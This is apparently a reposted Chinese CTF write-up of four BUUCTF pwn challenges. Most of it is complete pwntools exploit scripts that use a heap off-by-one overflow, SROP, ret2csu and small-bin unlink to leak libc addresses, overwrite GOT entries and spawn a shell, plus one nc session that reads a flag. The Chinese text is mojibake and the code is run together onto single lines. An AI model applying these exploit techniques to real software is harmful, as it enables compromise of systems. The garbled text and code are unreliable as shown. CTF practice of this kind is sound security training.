PWN-PRACTICE-BUUCTF-17

• • hitcontraining_heapcreator
  • wustctf2020_closed
  • ciscn_2019_es_7
  • hitcon2014_stkof

hitcontraining_heapcreator

單字節(jié)溢出，修改下一個(gè)chunk的size，造成chunk overlap，實(shí)現(xiàn)任意地址讀寫
參考：buuctf hitcontraining_heapcreator HITCON Trainging lab13

# -*- coding:UTF-8 -*- from pwn import * #io=process("./heapcreator") io=remote("node4.buuoj.cn",25331) elf=ELF("./heapcreator") libc=ELF("./libc-2.23-16-x64.so")def create(size,content):io.sendlineafter("Your choice :","1")io.sendlineafter("Size of Heap : ",str(size))io.sendlineafter("Content of heap:",content) def edit(index,content):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Content of heap : ",content)#單字節(jié)溢出 def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index)) def delete(index):io.sendlineafter("Your choice :","4")io.sendlineafter("Index :",str(index)) def exit():io.sendlineafter("Your choice :","5")heaparray=0x00000000006020A0#gdb.attach(io) #pause()create(0x18,"aaaa") create(0x10,"bbbb") create(0x10,"cccc") create(0x10,"/bin/sh\x00")#pause()edit(0,"a"*0x18+"\x81") delete(1)#pause()size="\x08".ljust(8,"\x00") payload="d"*0x40+size+p64(elf.got["free"]) create(0x70,payload)#pause()show(2) io.recvuntil("Content : ") free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00")) print("free_addr:"+hex(free_addr)) libc_base=free_addr-libc.sym["free"] system=libc_base+libc.sym["system"] edit(2,p64(system)) delete(3)#pause()io.interactive()

wustctf2020_closed

題目所給的elf文件關(guān)閉了標(biāo)準(zhǔn)輸出(fd=1)和標(biāo)準(zhǔn)錯(cuò)誤(fd=2)
利用重定向?qū)?biāo)準(zhǔn)輸出重定向到標(biāo)準(zhǔn)輸入(fd=0)

p1umh0@p1umh0:~/ctf/pwn$ nc node4.buuoj.cn 25787__ ___ ______ ___ / |/ /__ /_ __/__< /_ __/ /|_/ / _ `// / / __/ /\ \ / /_/ /_/\_,_//_/ /_/ /_//_\_\ HaHaHa! What else can you do??? exec 1>&0 cat flag flag{b02e836b-f53a-4c9a-8287-b54b93c7c65f} ^C

ciscn_2019_es_7

棧溢出，SROP或者ret2csu均可
SROP exp：

from pwn import * context.arch='amd64' context.os='linux' #io=process('./ciscn_2019_es_7') io=remote("node4.buuoj.cn",29577) elf=ELF('./ciscn_2019_es_7') rax_0xf=0x4004DA syscall=0x400517 vuln_addr=0x4004ED payload='a'*0x10+p64(vuln_addr) io.send(payload) io.recv(0x20) stack_addr=u64(io.recv(6).ljust(8,'\x00')) print(stack_addr) binsh_addr=stack_addr-0x118 sigframe = SigreturnFrame() sigframe.rax = constants.SYS_execve sigframe.rdi = binsh_addr sigframe.rsi = 0x0 sigframe.rdx = 0x0 sigframe.rsp = stack_addr sigframe.rip = syscall payload='/bin/sh\x00' payload=payload.ljust(0x10,'a') payload+=p64(rax_0xf)+p64(syscall)+str(sigframe) io.send(payload) io.interactive()

ret2csu exp：

from pwn import * #io=process('./ciscn_2019_es_7') io=remote("node4.buuoj.cn",29577) execve_addr=0x4004E2 syscall = 0x400517 part1=0x40059A part2=0x400580 pop_rdi_ret = 0x00000000004005a3 vuln_addr=0x4004ED payload='a'*0x10+p64(vuln_addr) io.sendline(payload) io.recv(0x20) stack=u64(io.recv(8)) binsh_addr=stack-0x118 execve_stack=stack-0x110 payload='/bin/sh\x00'+p64(execve_addr) def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):payload = p64(part1) # part1 entry pop_rbx_rbp_r12_r13_r14_r15_retpayload += p64(0x0) # rbx must be 0x0payload += p64(0x1) # rbp must be 0x1payload += p64(jmp2) # r12 jump topayload += p64(arg3) # r13 -> rdx arg3payload += p64(arg2) # r14 -> rsi arg2payload += p64(arg1) # r15d -> edi arg1payload += p64(part2) # part2 entry will call [r12+rbx*0x8]payload += 'A' * 56 # junk 6*8+8=56return payload payload+=com_gadget(part1,part2,execve_stack,0,0,0) payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(syscall) io.sendline(payload) io.interactive()

hitcon2014_stkof

利用small bin 的 unlink實(shí)現(xiàn)任意地址讀寫，參考：前端 Unlink筆記&2014 HITCON stkof題解

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./stkof") io=remote("node4.buuoj.cn",29090) elf=ELF("./stkof") libc=ELF("./libc-2.23-16-x64.so") free_got=elf.got["free"] puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] atoi_got=elf.got["atoi"]def create(size):io.sendline("1")io.sendline(str(size))io.recvuntil("OK\n") def fill(index,size,content):io.sendline("2")io.sendline(str(index))io.sendline(str(size))io.send(content)#io.recvuntil("OK\n") def free(index):io.sendline("3")io.sendline(str(index))#io.recvuntil("OK\n") def show(index):io.sendline("4")io.sendline(str(index))io.recvuntil("OK\n")#gdb.attach(io) #pause()s=0x0000000000602140 create(0x100)#chunk1 create(0x30)#chunk2 create(0x80)#chunk3 FD=s+16-0x18 BK=s+16-0x10 payload=p64(0)+p64(0x30)+p64(FD)+p64(BK) payload=payload.ljust(0x30,"A") payload+=p64(0x30)+p64(0x90) fill(2,len(payload),payload)#pause()free(3)#pause()payload="a"*0x10+p64(free_got)+p64(puts_got)+p64(atoi_got) fill(2,len(payload),payload) fill(1,len(p64(puts_plt)),p64(puts_plt))#pause()free(2) puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print(hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] system=libc_base+libc.sym["system"] fill(3,len(p64(system)),p64(system)) io.sendline("/bin/sh\x00") #pause()io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-17的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。